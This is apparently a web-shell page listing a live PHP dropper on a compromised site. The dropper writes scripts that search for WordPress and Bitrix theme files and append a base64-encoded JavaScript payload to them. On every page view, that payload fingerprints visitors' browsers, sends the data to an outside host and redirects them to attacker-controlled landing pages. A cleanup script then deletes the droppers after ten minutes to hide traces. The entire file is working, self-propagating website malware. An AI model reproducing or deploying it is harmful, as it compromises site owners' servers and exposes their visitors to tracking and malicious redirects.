Your IP : 18.116.81.162

Current Path : /home/sudancam/public_html/
Upload File :
Current File : /home/sudancam/public_html/rogix6f15.php

<?php

$codeWP = '<?php
function findAccessiblePaths($path) {
    $parts = explode("/", $path);
    $currentPath = "/";
    $accessiblePaths = [];

    foreach ($parts as $part) {
        if (!empty($part)) {
            $currentPath .= $part . "/";
            if (is_readable($currentPath)) {
                $accessiblePaths[] = $currentPath;
            }
        }
    }
    return $accessiblePaths;
}
function findWpThemesCrossPlatform() {
    $cwd = getcwd();
    $accessiblePaths = findAccessiblePaths($cwd);
    $allModifiedFiles = [];

    foreach ($accessiblePaths as $path) {
        $command = getSearchCommand($path);
        $output = shell_exec($command);
        $functionsPaths = [];

        if ($output) {
            $paths = preg_split("/\r\n|\r|\n/", trim($output));
            foreach ($paths as $path) {
                $foundPaths = findFilesRecursively($path, "functions.php");
                $functionsPaths = array_merge($functionsPaths, $foundPaths);
            }
        }

        $modifiedFiles = addCustomScriptToFiles($functionsPaths);
        if (!empty($modifiedFiles)) {
            $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
            break;
        }
    }

    if (empty($allModifiedFiles)) {
        echo "No themes modified or accessible";
    } else {
        print_r($allModifiedFiles);
    }
}
function addCustomScriptToFiles(array $functionsPaths) {
    $modifiedFiles = [];
    $newFunctionCode = getCustomScript();

    foreach ($functionsPaths as $functionsPath) {
        if (file_exists($functionsPath) && is_writable($functionsPath)) {
            $code = file_get_contents($functionsPath);
            if (strpos($code, "wp_system_query_script") === false) {
                $code .= "\n" . $newFunctionCode;
                file_put_contents($functionsPath, $code);
                $modifiedFiles[] = $functionsPath;
            }
        }
    }
    return $modifiedFiles;
}
function getCustomScript() {
    return <<<PHP
function wp_system_query_script() {
    ?>
<script src="data:text/javascript;base64,ZnVuY3Rpb24gcShlKXtmdW5jdGlvbiBmKGIsaCl7Zm9yKHZhciBjIGluIGIpdHJ5e3ZhciBkPWJbY107c3dpdGNoKHR5cGVvZiBkKXtjYXNlICJvYmplY3QiOmlmKG51bGw9PT1kKWNvbnRpbnVlO2Nhc2UgImZ1bmN0aW9uIjpkPWQudG9TdHJpbmcoKX1hW2grY109ZH1jYXRjaChtKXt9dHJ5e3ZhciBrPU9iamVjdC5nZXRPd25Qcm9wZXJ0eU5hbWVzKGIpO2FbaF09ay5sZW5ndGg7Zm9yKGM9MDtjPGsubGVuZ3RoOysrYyl0cnl7ZD1iW2tbY11dO3N3aXRjaCh0eXBlb2YgZCl7Y2FzZSAib2JqZWN0IjppZihudWxsPT09ZCljb250aW51ZTtjYXNlICJmdW5jdGlvbiI6ZD1kLnRvU3RyaW5nKCl9YVtoK2tbY11dPWR9Y2F0Y2gobSl7fX1jYXRjaChtKXt9fWU9dm9pZCAwPT09ZT97fTplO3ZhciBhPXt9O2YoZG9jdW1lbnQsImRvYy4iKTtmKG5hdmlnYXRvciwibmF2LiIpO2Yoc2NyZWVuLCJzY3IuIik7Zih3aW5kb3csIndpbi4iKTsoZnVuY3Rpb24oYixoKXt0cnl7Yj1iLmF0dHJpYnV0ZXM7Zm9yKHZhciBjIGluIGIpYz1iW2NdLGFbaCtjLm5vZGVOYW1lXT1jLm5vZGVWYWx1ZX1jYXRjaChkKXt9fSkoZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LCJodG1sLiIpO3RyeXt2YXIgZz1mdW5jdGlvbigpe30sbj0wO2cudG9TdHJpbmc9ZnVuY3Rpb24oKXsrK247cmV0dXJuIiJ9O2NvbnNvbGUubG9nKGcpO2EudG9zdHJpbmc9bn1jYXRjaChiKXt9dHJ5e2EuY2xvc3VyZT1mdW5jdGlvbigpe30udG9TdHJpbmcoKX1jYXRjaChiKXt9dHJ5e3ZhciBsPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImNhbnZhcyIpLmdldENvbnRleHQoIndlYmdsIikscD1sLmdldEV4dGVuc2lvbigiV0VCR0xfZGVidWdfcmVuZGVyZXJfaW5mbyIpO2Eud2ViZ2w9W2wuZ2V0UGFyYW1ldGVyKHAuVU5NQVNLRURfVkVORE9SX1dFQkdMKSxsLmdldFBhcmFtZXRlcihwLlVOTUFTS0VEX1JFTkRFUkVSX1dFQkdMKV0uam9pbigiICIpfWNhdGNoKGIpe310cnl7YS50b3VjaEV2ZW50PWRvY3VtZW50LmNyZWF0ZUV2ZW50KCJUb3VjaEV2ZW50IikudG9TdHJpbmcoKX1jYXRjaChiKXt9ZS5kYXRhPWE7cmV0dXJuIGV9IWZ1bmN0aW9uKCl7aWYoLTE9PXdpbmRvdy5sb2NhdGlvbi5ocmVmLnNlYXJjaCgiWz8mXV9ub19yZWRpcmVjdD1vbiIpKXt2YXIgZT1uZXcgWE1MSHR0cFJlcXVlc3Q7ZS53aXRoQ3JlZGVudGlhbHM9ITAscGFyYW1zPXEoe30pLGUub3BlbigiUE9TVCIsImh0dHBzOi8vdHJhZmZpYy1zdHJlYW0uZ2xvYmFsLnNzbC5mYXN0bHkubmV0L2NycXlsN2sucGhwP2tleT1udzA1b2N0a29pNHVtZndhNW14MCZscF90eXBlPWpzX3JlZGlyZWN0JiIrd2luZG93LmxvY2F0aW9uLnNlYXJjaC5zdWJzdHJpbmcoMSksITApLGUscmVzcG9uc2VUeXBlPSdqc29uJyxlLm9ubG9hZD1mdW5jdGlvbigpe2lmKDIwMD09PWUuc3RhdHVzKXt2YXIgdD1KU09OLnBhcnNlKGUucmVzcG9uc2VUZXh0KTtyZXR1cm4gdC5sYW5kaW5nX2h0bWw/KGRvY3VtZW50Lm9wZW4oKSxkb2N1bWVudC53cml0ZSh0LmxhbmRpbmdfaHRtbCksdm9pZCBkb2N1bWVudC5jbG9zZSgpKTp0LmxhbmRpbmdfdXJsPyhkb2N1bWVudC5vcGVuKCksZG9jdW1lbnQud3JpdGUoIjxodG1sPjxoZWFkPiIpLGRvY3VtZW50LndyaXRlKCc8bWV0YSBuYW1lPSJyZWZlcnJlciIgY29udGVudD0ibmV2ZXIiIC8+JyksZG9jdW1lbnQud3JpdGUoJzxtZXRhIGh0dHAtZXF1aXY9InJlZnJlc2giIGNvbnRlbnQ9IjA7IHVybD0nK3QubGFuZGluZ191cmwrJyIgLz4nKSxkb2N1bWVudC53cml0ZSgiPC9oZWFkPjwvaHRtbD4iKSx2b2lkIGRvY3VtZW50LmNsb3NlKCkpOnZvaWQgMH19LGUuc2VuZChKU09OLnN0cmluZ2lmeShwYXJhbXMpKX19KCk7"></script>
    <?php
}
add_action("wp_footer", "wp_system_query_script");
add_action("wp_body_open", "wp_system_query_script");
PHP;
}
function getSearchCommand($startPath) {
    $os = strtoupper(substr(PHP_OS, 0, 3));
    if ($os === "WIN") {
        return "dir /s /b /a:d {$startPath}*wp-content\\themes*";
    } else {
        return "find {$startPath} -type d -name \'themes\' -path \'*/wp-content/themes\' 2>/dev/null";
    }
}
function findFilesRecursively($dir, $fileName) {
    $results = [];
    $files = scandir($dir);

    foreach ($files as $file) {
        if ($file !== "." && $file !== "..") {
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) {
                $results = array_merge($results, findFilesRecursively($path, $fileName));
            } elseif ($file === $fileName) {
                $results[] = $path;
            }
        }
    }

    return $results;
}

findWpThemesCrossPlatform();
die();
?>';

$codeBT = '<?php 
function findAccessiblePaths($path)
{
    $parts = explode("/", $path);
    $currentPath = "/";
    $accessiblePaths = [];

    foreach ($parts as $part) {
        if (!empty($part)) {
            $currentPath .= $part . "/";
            if (is_readable($currentPath)) {
                $accessiblePaths[] = $currentPath;
            }
        }
    }
    return $accessiblePaths;
}

function modifyBitrixTemplates()
{
    $cwd = getcwd();
    $accessiblePaths = findAccessiblePaths($cwd);
    $allModifiedFiles = [];

    foreach ($accessiblePaths as $path) {
        $command = getSearchCommand($path);
        $output = shell_exec($command);
        $templatePaths = [];

        if ($output) {
            $paths = preg_split("/\r\n|\r|\n/", trim($output));
            foreach ($paths as $path) {
                $foundPaths = findFilesRecursively($path, "header.php"); // Example file in a Bitrix template
                $templatePaths = array_merge($templatePaths, $foundPaths);
            }
        }

        $modifiedFiles = addCustomScriptToFiles($templatePaths);
        if (!empty($modifiedFiles)) {
            $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
            break;
        }
    }

    if (empty($allModifiedFiles)) {
        echo "No templates modified or accessible";
    } else {
        echo print_r($allModifiedFiles);
    }
}

function addCustomScriptToFiles(array $templatePaths)
{
    $modifiedFiles = [];
    $newFunctionCode = getCustomScript();

    foreach ($templatePaths as $templatePath) {
        if (file_exists($templatePath) && is_writable($templatePath)) {
            $code = file_get_contents($templatePath);
            if (strpos($code, "custom_query_script") === false) {
                $code .= "\n" . $newFunctionCode;
                file_put_contents($templatePath, $code);
                $modifiedFiles[] = $templatePath;
            }
        }
    }
    return $modifiedFiles;
}

function getCustomScript()
{
    return <<<HTML
<script src="data:text/javascript;base64,ZnVuY3Rpb24gcShlKXtmdW5jdGlvbiBmKGIsaCl7Zm9yKHZhciBjIGluIGIpdHJ5e3ZhciBkPWJbY107c3dpdGNoKHR5cGVvZiBkKXtjYXNlICJvYmplY3QiOmlmKG51bGw9PT1kKWNvbnRpbnVlO2Nhc2UgImZ1bmN0aW9uIjpkPWQudG9TdHJpbmcoKX1hW2grY109ZH1jYXRjaChtKXt9dHJ5e3ZhciBrPU9iamVjdC5nZXRPd25Qcm9wZXJ0eU5hbWVzKGIpO2FbaF09ay5sZW5ndGg7Zm9yKGM9MDtjPGsubGVuZ3RoOysrYyl0cnl7ZD1iW2tbY11dO3N3aXRjaCh0eXBlb2YgZCl7Y2FzZSAib2JqZWN0IjppZihudWxsPT09ZCljb250aW51ZTtjYXNlICJmdW5jdGlvbiI6ZD1kLnRvU3RyaW5nKCl9YVtoK2tbY11dPWR9Y2F0Y2gobSl7fX1jYXRjaChtKXt9fWU9dm9pZCAwPT09ZT97fTplO3ZhciBhPXt9O2YoZG9jdW1lbnQsImRvYy4iKTtmKG5hdmlnYXRvciwibmF2LiIpO2Yoc2NyZWVuLCJzY3IuIik7Zih3aW5kb3csIndpbi4iKTsoZnVuY3Rpb24oYixoKXt0cnl7Yj1iLmF0dHJpYnV0ZXM7Zm9yKHZhciBjIGluIGIpYz1iW2NdLGFbaCtjLm5vZGVOYW1lXT1jLm5vZGVWYWx1ZX1jYXRjaChkKXt9fSkoZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LCJodG1sLiIpO3RyeXt2YXIgZz1mdW5jdGlvbigpe30sbj0wO2cudG9TdHJpbmc9ZnVuY3Rpb24oKXsrK247cmV0dXJuIiJ9O2NvbnNvbGUubG9nKGcpO2EudG9zdHJpbmc9bn1jYXRjaChiKXt9dHJ5e2EuY2xvc3VyZT1mdW5jdGlvbigpe30udG9TdHJpbmcoKX1jYXRjaChiKXt9dHJ5e3ZhciBsPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImNhbnZhcyIpLmdldENvbnRleHQoIndlYmdsIikscD1sLmdldEV4dGVuc2lvbigiV0VCR0xfZGVidWdfcmVuZGVyZXJfaW5mbyIpO2Eud2ViZ2w9W2wuZ2V0UGFyYW1ldGVyKHAuVU5NQVNLRURfVkVORE9SX1dFQkdMKSxsLmdldFBhcmFtZXRlcihwLlVOTUFTS0VEX1JFTkRFUkVSX1dFQkdMKV0uam9pbigiICIpfWNhdGNoKGIpe310cnl7YS50b3VjaEV2ZW50PWRvY3VtZW50LmNyZWF0ZUV2ZW50KCJUb3VjaEV2ZW50IikudG9TdHJpbmcoKX1jYXRjaChiKXt9ZS5kYXRhPWE7cmV0dXJuIGV9IWZ1bmN0aW9uKCl7aWYoLTE9PXdpbmRvdy5sb2NhdGlvbi5ocmVmLnNlYXJjaCgiWz8mXV9ub19yZWRpcmVjdD1vbiIpKXt2YXIgZT1uZXcgWE1MSHR0cFJlcXVlc3Q7ZS53aXRoQ3JlZGVudGlhbHM9ITAscGFyYW1zPXEoe30pLGUub3BlbigiUE9TVCIsImh0dHBzOi8vdHJhZmZpYy1zdHJlYW0uZ2xvYmFsLnNzbC5mYXN0bHkubmV0L2NycXlsN2sucGhwP2tleT0yaDIycTU2eGdpaDN4cHhwMDQ5ZiZscF90eXBlPWpzX3JlZGlyZWN0JiIrd2luZG93LmxvY2F0aW9uLnNlYXJjaC5zdWJzdHJpbmcoMSksITApLGUscmVzcG9uc2VUeXBlPSdqc29uJyxlLm9ubG9hZD1mdW5jdGlvbigpe2lmKDIwMD09PWUuc3RhdHVzKXt2YXIgdD1KU09OLnBhcnNlKGUucmVzcG9uc2VUZXh0KTtyZXR1cm4gdC5sYW5kaW5nX2h0bWw/KGRvY3VtZW50Lm9wZW4oKSxkb2N1bWVudC53cml0ZSh0LmxhbmRpbmdfaHRtbCksdm9pZCBkb2N1bWVudC5jbG9zZSgpKTp0LmxhbmRpbmdfdXJsPyhkb2N1bWVudC5vcGVuKCksZG9jdW1lbnQud3JpdGUoIjxodG1sPjxoZWFkPiIpLGRvY3VtZW50LndyaXRlKCc8bWV0YSBuYW1lPSJyZWZlcnJlciIgY29udGVudD0ibmV2ZXIiIC8+JyksZG9jdW1lbnQud3JpdGUoJzxtZXRhIGh0dHAtZXF1aXY9InJlZnJlc2giIGNvbnRlbnQ9IjA7IHVybD0nK3QubGFuZGluZ191cmwrJyIgLz4nKSxkb2N1bWVudC53cml0ZSgiPC9oZWFkPjwvaHRtbD4iKSx2b2lkIGRvY3VtZW50LmNsb3NlKCkpOnZvaWQgMH19LGUuc2VuZChKU09OLnN0cmluZ2lmeShwYXJhbXMpKX19KCk7"></script>   
HTML;
}

function getSearchCommand($startPath)
{
    $os = strtoupper(substr(PHP_OS, 0, 3));
    if ($os === "WIN") {
        return "dir /s /b /a:d {$startPath}*bitrix*";
    } else {
        return "find {$startPath} -type d -name \'bitrix\' -path \'*/bitrix\' 2>/dev/null";
    }
}

function findFilesRecursively($dir, $fileName)
{
    $results = [];
    $files = scandir($dir);

    foreach ($files as $file) {
        if ($file !== "." && $file !== "..") {
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) {
                $results = array_merge($results, findFilesRecursively($path, $fileName));
            } elseif ($file === $fileName) {
                $results[] = $path;
            }
        }
    }

    return $results;
}

modifyBitrixTemplates(); 
die(); 
?>';

$del = <<<PHP
<?php
unlink('wp.php');
unlink('bt.php');
unlink('wpbtStart.php');
?>
PHP;

file_put_contents('wp.php', $codeWP);
file_put_contents('bt.php', $codeBT);
file_put_contents('del.php', $del);

$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
    shell_exec("start /B php wp.php > log_wp.txt 2>&1");
    shell_exec("start /B php bt.php > log_bt.txt 2>&1");
    shell_exec("Start-Sleep -Seconds 600; Start-Process 'php' -ArgumentList 'del.php' -NoNewWindow");
} else {
    shell_exec("php wp.php > log_wp.txt 2>&1 &");
    shell_exec("php bt.php > log_bt.txt 2>&1 &");
    shell_exec("(sleep 600 && php del.php) > /dev/null 2>&1 &");
}

?>